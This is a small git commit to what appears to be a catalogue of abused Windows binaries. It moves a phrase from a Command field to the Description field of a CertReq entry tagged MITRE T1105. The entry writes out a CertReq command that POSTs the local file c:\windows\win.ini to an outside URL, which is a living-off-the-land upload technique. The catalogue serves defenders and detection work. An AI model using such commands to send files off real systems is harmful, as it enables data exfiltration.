Moved text to correct line (#349)

Moved "and show response in terminal" from `Command` to `Description`
This commit is contained in:
Bjarne
2024-02-17 18:14:08 +01:00
committed by GitHub
parent bba87a6c2a
commit ce53e1376a

View File

@@ -11,8 +11,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
Usecase: Upload
Category: Upload
Privileges: User